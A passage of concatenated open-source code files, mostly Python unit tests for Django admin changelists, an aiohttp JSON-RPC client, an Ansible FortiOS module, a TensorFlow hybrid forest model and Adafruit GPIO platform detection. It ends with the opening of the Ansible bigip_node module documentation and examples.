self.assertEqual(list(cl.paginator.page_range), [1, 2, 3, 4, 5, 6])
# Test custom queryset
m = FilteredChildAdmin(Child, custom_site)
cl = ChangeList(request, Child, *get_changelist_args(m))
self.assertEqual(cl.queryset.count(), 30)
self.assertEqual(cl.paginator.count, 30)
self.assertEqual(list(cl.paginator.page_range), [1, 2, 3])
def test_computed_list_display_localization(self):
"""
Regression test for #13196: output of functions should be localized
in the changelist.
"""
User.objects.create_superuser(
username='super', email='super@localhost', password='secret')
self.client.login(username='super', password='secret')
event = Event.objects.create(date=datetime.date.today())
response = self.client.get(reverse('admin:admin_changelist_event_changelist'))
self.assertContains(response, formats.localize(event.date))
self.assertNotContains(response, six.text_type(event.date))
def test_dynamic_list_display(self):
"""
Regression tests for #14206: dynamic list_display support.
"""
parent = Parent.objects.create(name='parent')
for i in range(10):
Child.objects.create(name='child %s' % i, parent=parent)
user_noparents = self._create_superuser('noparents')
user_parents = self._create_superuser('parents')
# Test with user 'noparents'
m = custom_site._registry[Child]
request = self._mocked_authenticated_request('/child/', user_noparents)
response = m.changelist_view(request)
self.assertNotContains(response, 'Parent object')
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
self.assertEqual(list_display, ['name', 'age'])
self.assertEqual(list_display_links, ['name'])
# Test with user 'parents'
m = DynamicListDisplayChildAdmin(Child, custom_site)
request = self._mocked_authenticated_request('/child/', user_parents)
response = m.changelist_view(request)
self.assertContains(response, 'Parent object')
custom_site.unregister(Child)
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
self.assertEqual(list_display, ('parent', 'name', 'age'))
self.assertEqual(list_display_links, ['parent'])
# Test default implementation
custom_site.register(Child, ChildAdmin)
m = custom_site._registry[Child]
request = self._mocked_authenticated_request('/child/', user_noparents)
response = m.changelist_view(request)
self.assertContains(response, 'Parent object')
def test_show_all(self):
parent = Parent.objects.create(name='anything')
for i in range(30):
Child.objects.create(name='name %s' % i, parent=parent)
Child.objects.create(name='filtered %s' % i, parent=parent)
# Add "show all" parameter to request
request = self.factory.get('/child/', data={ALL_VAR: ''})
# Test valid "show all" request (number of total objects is under max)
m = ChildAdmin(Child, custom_site)
m.list_max_show_all = 200
# 200 is the max we'll pass to ChangeList
cl = ChangeList(request, Child, *get_changelist_args(m))
cl.get_results(request)
self.assertEqual(len(cl.result_list), 60)
# Test invalid "show all" request (number of total objects over max)
# falls back to paginated pages
m = ChildAdmin(Child, custom_site)
m.list_max_show_all = 30
# 30 is the max we'll pass to ChangeList for this test
cl = ChangeList(request, Child, *get_changelist_args(m))
cl.get_results(request)
self.assertEqual(len(cl.result_list), 10)
def test_dynamic_list_display_links(self):
"""
Regression tests for #16257: dynamic list_display_links support.
"""
parent = Parent.objects.create(name='parent')
for i in range(1, 10):
Child.objects.create(id=i, name='child %s' % i, parent=parent, age=i)
m = DynamicListDisplayLinksChildAdmin(Child, custom_site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/child/', superuser)
response = m.changelist_view(request)
for i in range(1, 10):
link = reverse('admin:admin_changelist_child_change', args=(i,))
self.assertContains(response, '<a href="%s">%s</a>' % (link, i))
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
self.assertEqual(list_display, ('parent', 'name', 'age'))
self.assertEqual(list_display_links, ['age'])
def test_no_list_display_links(self):
"""#15185 -- Allow no links from the 'change list' view grid."""
p = Parent.objects.create(name='parent')
m = NoListDisplayLinksParentAdmin(Parent, custom_site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/parent/', superuser)
response = m.changelist_view(request)
link = reverse('admin:admin_changelist_parent_change', args=(p.pk,))
self.assertNotContains(response, '<a href="%s">' % link)
def test_tuple_list_display(self):
"""
Regression test for #17128
(ChangeList failing under Python 2.5 after r16319)
"""
swallow = Swallow.objects.create(origin='Africa', load='12.34', speed='22.2')
swallow2 = Swallow.objects.create(origin='Africa', load='12.34', speed='22.2')
swallow_o2o = SwallowOneToOne.objects.create(swallow=swallow2)
model_admin = SwallowAdmin(Swallow, custom_site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/swallow/', superuser)
response = model_admin.changelist_view(request)
# just want to ensure it doesn't blow up during rendering
self.assertContains(response, six.text_type(swallow.origin))
self.assertContains(response, six.text_type(swallow.load))
self.assertContains(response, six.text_type(swallow.speed))
# Reverse one-to-one relations should work.
self.assertContains(response, '<td class="field-swallowonetoone">-</td>')
self.assertContains(response, '<td class="field-swallowonetoone">%s</td>' % swallow_o2o)
def test_deterministic_order_for_unordered_model(self):
"""
Ensure that the primary key is systematically used in the ordering of
the changelist's results to guarantee a deterministic order, even
when the Model doesn't have any default ordering defined.
Refs #17198.
"""
superuser = self._create_superuser('superuser')
for counter in range(1, 51):
UnorderedObject.objects.create(id=counter, bool=True)
class UnorderedObjectAdmin(admin.ModelAdmin):
list_per_page = 10
def check_results_order(ascending=False):
custom_site.register(UnorderedObject, UnorderedObjectAdmin)
model_admin = UnorderedObjectAdmin(UnorderedObject, custom_site)
counter = 0 if ascending else 51
for page in range(0, 5):
request = self._mocked_authenticated_request('/unorderedobject/?p=%s' % page, superuser)
response = model_admin.changelist_view(request)
for result in response.context_data['cl'].result_list:
counter += 1 if ascending else -1
self.assertEqual(result.id, counter)
custom_site.unregister(UnorderedObject)
# When no order is defined at all, everything is ordered by '-pk'.
check_results_order()
# When an order field is defined but multiple records have the same
# value for that field, make sure everything gets ordered by -pk as well.
UnorderedObjectAdmin.ordering = ['bool']
check_results_order()
# When order fields are defined, including the pk itself, use them.
UnorderedObjectAdmin.ordering = ['bool', '-pk']
check_results_order()
UnorderedObjectAdmin.ordering = ['bool', 'pk']
check_results_order(ascending=True)
UnorderedObjectAdmin.ordering = ['-id', 'bool']
check_results_order()
UnorderedObjectAdmin.ordering = ['id', 'bool']
check_results_order(ascending=True)
def test_deterministic_order_for_model_ordered_by_its_manager(self):
"""
Ensure that the primary key is systematically used in the ordering of
the changelist's results to guarantee a deterministic order, even
when the Model has a manager that defines a default ordering.
Refs #17198.
"""
superuser = self._create_superuser('superuser')
for counter in range(1, 51):
OrderedObject.objects.create(id=counter, bool=True, number=counter)
class OrderedObjectAdmin(admin.ModelAdmin):
list_per_page = 10
def check_results_order(ascending=False):
custom_site.register(OrderedObject, OrderedObjectAdmin)
model_admin = OrderedObjectAdmin(OrderedObject, custom_site)
counter = 0 if ascending else 51
for page in range(0, 5):
request = self._mocked_authenticated_request('/orderedobject/?p=%s' % page, superuser)
response = model_admin.changelist_view(request)
for result in response.context_data['cl'].result_list:
counter += 1 if ascending else -1
self.assertEqual(result.id, counter)
custom_site.unregister(OrderedObject)
# When no order is defined at all, use the model's default ordering (i.e. 'number')
check_results_order(ascending=True)
# When an order field is defined but multiple records have the same
# value for that field, make sure everything gets ordered by -pk as well.
OrderedObjectAdmin.ordering = ['bool']
check_results_order()
# When order fields are defined, including the pk itself, use them.
OrderedObjectAdmin.ordering = ['bool', '-pk']
check_results_order()
OrderedObjectAdmin.ordering = ['bool', 'pk']
check_results_order(ascending=True)
OrderedObjectAdmin.ordering = ['-id', 'bool']
check_results_order()
OrderedObjectAdmin.ordering = ['id', 'bool']
check_results_order(ascending=True)
def test_dynamic_list_filter(self):
"""
Regression tests for ticket #17646: dynamic list_filter support.
"""
parent = Parent.objects.create(name='parent')
for i in range(10):
Child.objects.create(name='child %s' % i, parent=parent)
user_noparents = self._create_superuser('noparents')
user_parents = self._create_superuser('parents')
# Test with user 'noparents'
m = DynamicListFilterChildAdmin(Child, custom_site)
request = self._mocked_authenticated_request('/child/', user_noparents)
response = m.changelist_view(request)
self.assertEqual(response.context_data['cl'].list_filter, ['name', 'age'])
# Test with user 'parents'
m = DynamicListFilterChildAdmin(Child, custom_site)
request = self._mocked_authenticated_request('/child/', user_parents)
response = m.changelist_view(request)
self.assertEqual(response.context_data['cl'].list_filter, ('parent', 'name', 'age'))
def test_dynamic_search_fields(self):
child = self._create_superuser('child')
m = DynamicSearchFieldsChildAdmin(Child, custom_site)
request = self._mocked_authenticated_request('/child/', child)
response = m.changelist_view(request)
self.assertEqual(response.context_data['cl'].search_fields, ('name', 'age'))
def test_pagination_page_range(self):
"""
Regression tests for ticket #15653: ensure the number of pages
generated for changelist views are correct.
"""
# instantiating and setting up ChangeList object
m = GroupAdmin(Group, custom_site)
request = self.factory.get('/group/')
cl = ChangeList(request, Group, *get_changelist_args(m))
per_page = cl.list_per_page = 10
for page_num, objects_count, expected_page_range in [
(0, per_page, []),
(0, per_page * 2, list(range(2))),
(5, per_page * 11, list(range(11))),
(5, per_page * 12, [0, 1, 2, 3, 4, 5, 6, 7, 8, '.', 10, 11]),
(6, per_page * 12, [0, 1, '.', 3, 4, 5, 6, 7, 8, 9, 10, 11]),
(6, per_page * 13, [0, 1, '.', 3, 4, 5, 6, 7, 8, 9, '.', 11, 12]),
]:
# assuming we have exactly `objects_count` objects
Group.objects.all().delete()
for i in range(objects_count):
Group.objects.create(name='test band')
# setting page number and calculating page range
cl.page_num = page_num
cl.get_results(request)
real_page_range = pagination(cl)['page_range']
self.assertListEqual(
expected_page_range,
list(real_page_range),
)
class AdminLogNodeTestCase(TestCase):
def test_get_admin_log_templatetag_custom_user(self):
"""
Regression test for ticket #20088: admin log depends on User model
having id field as primary key.
The old implementation raised an AttributeError when trying to use
the id field.
"""
context = Context({'user': CustomIdUser()})
template_string = '{% load log %}{% get_admin_log 10 as admin_log for_user user %}'
template = Template(template_string)
# Rendering should be u'' since this templatetag just logs,
# it doesn't render any string.
self.assertEqual(template.render(context), '')
def test_get_admin_log_templatetag_no_user(self):
"""
The {% get_admin_log %} tag should work without specifying a user.
"""
user = User(username='jondoe', password='secret', email='super@example.com')
user.save()
ct = ContentType.objects.get_for_model(User)
LogEntry.objects.log_action(user.pk, ct.pk, user.pk, repr(user), 1)
t = Template(
'{% load log %}'
'{% get_admin_log 100 as admin_log %}'
'{% for entry in admin_log %}'
'{{ entry|safe }}'
'{% endfor %}'
)
self.assertEqual(t.render(Context({})), 'Added "<User: jondoe>".')
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF="admin_changelist.urls")
class SeleniumFirefoxTests(AdminSeleniumWebDriverTestCase):
available_apps = ['admin_changelist'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def setUp(self):
# password = "secret"
User.objects.create(
pk=100, username='super', first_name='Super', last_name='User', email='super@example.com',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
is_staff=True, last_login=datetime.datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime.datetime(2007, 5, 30, 13, 20, 10)
)
def test_add_row_selection(self):
"""
Ensure that the status line for selected rows gets updated correcly (#22038)
"""
self.admin_login(username='super', password='secret')
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:auth_user_changelist')))
form_id = '#changelist-form'
# Test amount of rows in the Changelist
rows = self.selenium.find_elements_by_css_selector(
'%s #result_list tbody tr' % form_id)
self.assertEqual(len(rows), 1)
# Test current selection
selection_indicator = self.selenium.find_element_by_css_selector(
'%s .action-counter' % form_id)
self.assertEqual(selection_indicator.text, "0 of 1 selected")
# Select a row and check again
row_selector = self.selenium.find_element_by_css_selector(
'%s #result_list tbody tr:first-child .action-select' % form_id)
row_selector.click()
self.assertEqual(selection_indicator.text, "1 of 1 selected")
class SeleniumChromeTests(SeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class SeleniumIETests(SeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
| bsd-3-clause |
pengutronix/aiohttp-json-rpc | tests/test_client.py | 1 | 2173 | import pytest
import aiohttp
from aiohttp_json_rpc.client import JsonRpcClient
pytestmark = pytest.mark.asyncio(reason='Depends on asyncio')
async def test_client_connect_disconnect(rpc_context):
async def ping(request):
return 'pong'
rpc_context.rpc.add_methods(
('', ping),
)
client = JsonRpcClient(
url='ws://{host}:{port}{url}'.format(
host=rpc_context.host, port=rpc_context.port,
url=rpc_context.url,
)
)
await client.connect_url(
'ws://{host}:{port}{url}'.format(
host=rpc_context.host, port=rpc_context.port,
url=rpc_context.url,
)
)
assert await client.call('ping') == 'pong'
await client.disconnect()
assert not hasattr(client, '_ws')
await client.connect(
host=rpc_context.host, port=rpc_context.port,
url=rpc_context.url,
)
assert await client.call('ping') == 'pong'
await client.disconnect()
async def test_client_autoconnect(rpc_context):
async def ping(request):
return 'pong'
rpc_context.rpc.add_methods(
('', ping),
)
client = JsonRpcClient(
url='ws://{host}:{port}{url}'.format(
host=rpc_context.host, port=rpc_context.port,
url=rpc_context.url,
)
)
assert not hasattr(client, '_ws')
assert await client.call('ping') == 'pong'
assert hasattr(client, '_ws')
initial_ws = client._ws
assert await client.call('ping') == 'pong'
assert initial_ws is client._ws
await client.disconnect()
async def test_client_connection_failure(rpc_context, unused_tcp_port_factory):
client = JsonRpcClient(
url='ws://{host}:{port}{url}'.format(
host=rpc_context.host, port=rpc_context.port,
url=rpc_context.url,
)
)
with pytest.raises(aiohttp.ClientConnectionError):
await client.connect_url(
'ws://{host}:{port}{url}'.format(
host=rpc_context.host, port=unused_tcp_port_factory(),
url=rpc_context.url,
)
)
assert client._session.closed is True
| apache-2.0 |
kvar/ansible | test/units/modules/network/fortios/test_fortios_wanopt_webcache.py | 21 | 9782 | # Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_wanopt_webcache
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_wanopt_webcache.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_wanopt_webcache_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wanopt_webcache': {
'always_revalidate': 'enable',
'cache_by_default': 'enable',
'cache_cookie': 'enable',
'cache_expired': 'enable',
'default_ttl': '7',
'external': 'enable',
'fresh_factor': '9',
'host_validate': 'enable',
'ignore_conditional': 'enable',
'ignore_ie_reload': 'enable',
'ignore_ims': 'enable',
'ignore_pnc': 'enable',
'max_object_size': '15',
'max_ttl': '16',
'min_ttl': '17',
'neg_resp_time': '18',
'reval_pnc': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_wanopt_webcache.fortios_wanopt(input_data, fos_instance)
expected_data = {
'always-revalidate': 'enable',
'cache-by-default': 'enable',
'cache-cookie': 'enable',
'cache-expired': 'enable',
'default-ttl': '7',
'external': 'enable',
'fresh-factor': '9',
'host-validate': 'enable',
'ignore-conditional': 'enable',
'ignore-ie-reload': 'enable',
'ignore-ims': 'enable',
'ignore-pnc': 'enable',
'max-object-size': '15',
'max-ttl': '16',
'min-ttl': '17',
'neg-resp-time': '18',
'reval-pnc': 'enable'
}
set_method_mock.assert_called_with('wanopt', 'webcache', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_wanopt_webcache_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wanopt_webcache': {
'always_revalidate': 'enable',
'cache_by_default': 'enable',
'cache_cookie': 'enable',
'cache_expired': 'enable',
'default_ttl': '7',
'external': 'enable',
'fresh_factor': '9',
'host_validate': 'enable',
'ignore_conditional': 'enable',
'ignore_ie_reload': 'enable',
'ignore_ims': 'enable',
'ignore_pnc': 'enable',
'max_object_size': '15',
'max_ttl': '16',
'min_ttl': '17',
'neg_resp_time': '18',
'reval_pnc': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_wanopt_webcache.fortios_wanopt(input_data, fos_instance)
expected_data = {
'always-revalidate': 'enable',
'cache-by-default': 'enable',
'cache-cookie': 'enable',
'cache-expired': 'enable',
'default-ttl': '7',
'external': 'enable',
'fresh-factor': '9',
'host-validate': 'enable',
'ignore-conditional': 'enable',
'ignore-ie-reload': 'enable',
'ignore-ims': 'enable',
'ignore-pnc': 'enable',
'max-object-size': '15',
'max-ttl': '16',
'min-ttl': '17',
'neg-resp-time': '18',
'reval-pnc': 'enable'
}
set_method_mock.assert_called_with('wanopt', 'webcache', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_wanopt_webcache_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wanopt_webcache': {
'always_revalidate': 'enable',
'cache_by_default': 'enable',
'cache_cookie': 'enable',
'cache_expired': 'enable',
'default_ttl': '7',
'external': 'enable',
'fresh_factor': '9',
'host_validate': 'enable',
'ignore_conditional': 'enable',
'ignore_ie_reload': 'enable',
'ignore_ims': 'enable',
'ignore_pnc': 'enable',
'max_object_size': '15',
'max_ttl': '16',
'min_ttl': '17',
'neg_resp_time': '18',
'reval_pnc': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_wanopt_webcache.fortios_wanopt(input_data, fos_instance)
expected_data = {
'always-revalidate': 'enable',
'cache-by-default': 'enable',
'cache-cookie': 'enable',
'cache-expired': 'enable',
'default-ttl': '7',
'external': 'enable',
'fresh-factor': '9',
'host-validate': 'enable',
'ignore-conditional': 'enable',
'ignore-ie-reload': 'enable',
'ignore-ims': 'enable',
'ignore-pnc': 'enable',
'max-object-size': '15',
'max-ttl': '16',
'min-ttl': '17',
'neg-resp-time': '18',
'reval-pnc': 'enable'
}
set_method_mock.assert_called_with('wanopt', 'webcache', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_wanopt_webcache_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wanopt_webcache': {
'random_attribute_not_valid': 'tag',
'always_revalidate': 'enable',
'cache_by_default': 'enable',
'cache_cookie': 'enable',
'cache_expired': 'enable',
'default_ttl': '7',
'external': 'enable',
'fresh_factor': '9',
'host_validate': 'enable',
'ignore_conditional': 'enable',
'ignore_ie_reload': 'enable',
'ignore_ims': 'enable',
'ignore_pnc': 'enable',
'max_object_size': '15',
'max_ttl': '16',
'min_ttl': '17',
'neg_resp_time': '18',
'reval_pnc': 'enable'
},
'vdom': 'root'}
is_error, changed, response = fortios_wanopt_webcache.fortios_wanopt(input_data, fos_instance)
expected_data = {
'always-revalidate': 'enable',
'cache-by-default': 'enable',
'cache-cookie': 'enable',
'cache-expired': 'enable',
'default-ttl': '7',
'external': 'enable',
'fresh-factor': '9',
'host-validate': 'enable',
'ignore-conditional': 'enable',
'ignore-ie-reload': 'enable',
'ignore-ims': 'enable',
'ignore-pnc': 'enable',
'max-object-size': '15',
'max-ttl': '16',
'min-ttl': '17',
'neg-resp-time': '18',
'reval-pnc': 'enable'
}
set_method_mock.assert_called_with('wanopt', 'webcache', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| gpl-3.0 |
shakamunyi/tensorflow | tensorflow/contrib/tensor_forest/hybrid/python/models/forest_to_data_then_nn_test.py | 159 | 3275 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the hybrid tensor forest model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
# pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.hybrid.python.models import forest_to_data_then_nn
from tensorflow.contrib.tensor_forest.python import tensor_forest
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import test_util
from tensorflow.python.framework.ops import Operation
from tensorflow.python.framework.ops import Tensor
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import googletest
class ForestToDataThenNNTest(test_util.TensorFlowTestCase):
def setUp(self):
self.params = tensor_forest.ForestHParams(
num_classes=2,
num_features=31,
layer_size=11,
num_layers=13,
num_trees=3,
connection_probability=0.1,
hybrid_tree_depth=4,
regularization_strength=0.01,
regularization="",
base_random_seed=10,
feature_bagging_fraction=1.0,
learning_rate=0.01,
weight_init_mean=0.0,
weight_init_std=0.1)
self.params.regression = False
self.params.num_nodes = 2**self.params.hybrid_tree_depth - 1
self.params.num_leaves = 2**(self.params.hybrid_tree_depth - 1)
self.params.num_features_per_node = (self.params.feature_bagging_fraction *
self.params.num_features)
def testInferenceConstruction(self):
# pylint: disable=W0612
data = constant_op.constant(
[[random.uniform(-1, 1) for i in range(self.params.num_features)]
for _ in range(100)])
with variable_scope.variable_scope(
"ForestToDataThenNNTest_testInferenceContruction"):
graph_builder = forest_to_data_then_nn.ForestToDataThenNN(self.params)
graph = graph_builder.inference_graph(data, None)
self.assertTrue(isinstance(graph, Tensor))
def testTrainingConstruction(self):
# pylint: disable=W0612
data = constant_op.constant(
[[random.uniform(-1, 1) for i in range(self.params.num_features)]
for _ in range(100)])
labels = [1 for _ in range(100)]
with variable_scope.variable_scope(
"ForestToDataThenNNTest.testTrainingContruction"):
graph_builder = forest_to_data_then_nn.ForestToDataThenNN(self.params)
graph = graph_builder.training_graph(data, labels, None)
self.assertTrue(isinstance(graph, Operation))
if __name__ == "__main__":
googletest.main()
| apache-2.0 |
ehooo/Adafruit_Python_GPIO | tests/test_Platform.py | 10 | 3169 | # Copyright (c) 2014 Adafruit Industries
# Author: Tony DiCola
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import unittest
from mock import Mock, patch
import Adafruit_GPIO.Platform as Platform
class TestPlatformDetect(unittest.TestCase):
@patch('platform.platform', Mock(return_value='Linux-3.8.13-bone47-armv7l-with-debian-7.4'))
def test_beaglebone_black(self):
result = Platform.platform_detect()
self.assertEquals(result, Platform.BEAGLEBONE_BLACK)
@patch('platform.platform', Mock(return_value='Darwin-13.2.0-x86_64-i386-64bit'))
def test_unknown(self):
result = Platform.platform_detect()
self.assertEquals(result, Platform.UNKNOWN)
class TestPiRevision(unittest.TestCase):
def test_revision_1(self):
with patch('__builtin__.open') as mock_open:
handle = mock_open.return_value.__enter__.return_value
handle.__iter__.return_value = iter(['Revision : 0000'])
rev = Platform.pi_revision()
self.assertEquals(rev, 1)
with patch('__builtin__.open') as mock_open:
handle = mock_open.return_value.__enter__.return_value
handle.__iter__.return_value = iter(['Revision : 0002'])
rev = Platform.pi_revision()
self.assertEquals(rev, 1)
with patch('__builtin__.open') as mock_open:
handle = mock_open.return_value.__enter__.return_value
handle.__iter__.return_value = iter(['Revision : 0003'])
rev = Platform.pi_revision()
self.assertEquals(rev, 1)
def test_revision_2(self):
with patch('__builtin__.open') as mock_open:
handle = mock_open.return_value.__enter__.return_value
handle.__iter__.return_value = iter(['Revision : 000e'])
rev = Platform.pi_revision()
self.assertEquals(rev, 2)
def test_unknown_revision(self):
with patch('__builtin__.open') as mock_open:
handle = mock_open.return_value.__enter__.return_value
handle.__iter__.return_value = iter(['foobar'])
self.assertRaises(RuntimeError, Platform.pi_revision)
| mit |
cherusk/ansible | lib/ansible/modules/network/f5/bigip_node.py | 72 | 16390 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2013, Matt Hite <mhite@hotmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: bigip_node
short_description: "Manages F5 BIG-IP LTM nodes"
description:
- "Manages F5 BIG-IP LTM nodes via iControl SOAP API"
version_added: "1.4"
author:
- Matt Hite (@mhite)
- Tim Rupp (@caphrim007)
notes:
- "Requires BIG-IP software version >= 11"
- "F5 developed module 'bigsuds' required (see http://devcentral.f5.com)"
- "Best run as a local_action in your playbook"
requirements:
- bigsuds
options:
state:
description:
- Pool member state
required: true
default: present
choices: ['present', 'absent']
aliases: []
session_state:
description:
- Set new session availability status for node
version_added: "1.9"
required: false
default: null
choices: ['enabled', 'disabled']
aliases: []
monitor_state:
description:
- Set monitor availability status for node
version_added: "1.9"
required: false
default: null
choices: ['enabled', 'disabled']
aliases: []
partition:
description:
- Partition
required: false
default: 'Common'
choices: []
aliases: []
name:
description:
- "Node name"
required: false
default: null
choices: []
monitor_type:
description:
- Monitor rule type when monitors > 1
version_added: "2.2"
required: False
default: null
choices: ['and_list', 'm_of_n']
aliases: []
quorum:
description:
- Monitor quorum value when monitor_type is m_of_n
version_added: "2.2"
required: False
default: null
choices: []
aliases: []
monitors:
description:
- Monitor template name list. Always use the full path to the monitor.
version_added: "2.2"
required: False
default: null
choices: []
aliases: []
host:
description:
- "Node IP. Required when state=present and node does not exist. Error when state=absent."
required: true
default: null
choices: []
aliases: ['address', 'ip']
description:
description:
- "Node description."
required: false
default: null
choices: []
extends_documentation_fragment: f5
'''
EXAMPLES = '''
- name: Add node
bigip_node:
server: "lb.mydomain.com"
user: "admin"
password: "secret"
state: "present"
partition: "Common"
host: "10.20.30.40"
name: "10.20.30.40"
# Note that the BIG-IP automatically names the node using the
# IP address specified in previous play's host parameter.
# Future plays referencing this node no longer use the host
# parameter but instead use the name parameter.
# Alternatively, you could have specified a name with the
# name parameter when state=present.
- name: Add node with a single 'ping' monitor
bigip_node:
server: "lb.mydomain.com"
user: "admin"
password: "secret"
state: "present"
partition: "Common"
host: "10.20.30.40"
name: "mytestserver"
monitors:
- /Common/icmp
delegate_to: localhost
- name: Modify node description
bigip_node:
server: "lb.mydomain.com"
user: "admin"
password: "secret"
state: "present"
partition: "Common"
name: "10.20.30.40"
description: "Our best server yet"
delegate_to: localhost
- name: Delete node
bigip_node:
server: "lb.mydomain.com"
user: "admin"
password: "secret"
state: "absent"
partition: "Common"
name: "10.20.30.40"
# The BIG-IP GUI doesn't map directly to the API calls for "Node ->
# General Properties -> State". The following states map to API monitor
# and session states.
#
# Enabled (all traffic allowed):
# monitor_state=enabled, session_state=enabled
# Disabled (only persistent or active connections allowed):
# monitor_state=enabled, session_state=disabled
# Forced offline (only active connections allowed):
# monitor_state=disabled, session_state=disabled
#
# See https://devcentral.f5.com/questions/icontrol-equivalent-call-for-b-node-down
- name: Force node offline
bigip_node:
server: "lb.mydomain.com"
user: "admin"
password: "mysecret"
state: "present"
session_state: "disabled"
